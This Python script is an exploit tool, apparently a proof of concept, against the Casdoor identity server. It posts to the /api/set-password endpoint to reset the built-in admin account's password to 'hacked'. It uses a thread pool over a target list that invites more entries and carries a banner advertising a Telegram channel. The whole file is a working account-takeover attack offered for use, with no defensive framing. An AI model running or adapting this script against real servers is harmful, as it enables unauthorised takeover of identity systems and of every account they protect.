import requests
from concurrent.futures import ThreadPoolExecutor

def print_banner():
    banner = """
    @0xLogs
    https://t.me/+qeejqIiGum9jOTI9
    """
    print(banner)

def exploit_casdoor(url, user_owner, user_name, new_password):
    data = {
        'userOwner': user_owner,
        'userName': user_name,
        'newPassword': new_password
    }
    try:
        response = requests.post(f"{url}/api/set-password", data=data)
        if response.status_code == 200:
            return f"Success: Password changed for {user_name}"
        else:
            return f"Failed: {response.status_code} - {response.text}"
    except requests.RequestException as e:
        return f"Error: {e}"

def main():
    print_banner()
    base_url = "http://localhost:8000"
    user_owner = "built-in"
    user_name = "admin"
    new_password = "hacked"
    targets = [
        {"url": base_url, "user_owner": user_owner, "user_name": user_name, "new_password": new_password},
        # Add more targets if needed
    ]

    with ThreadPoolExecutor(max_workers=5) as executor:
        results = list(executor.map(lambda target: exploit_casdoor(**target), targets))
    
    for result in results:
        print(result)

if __name__ == "__main__":
    main()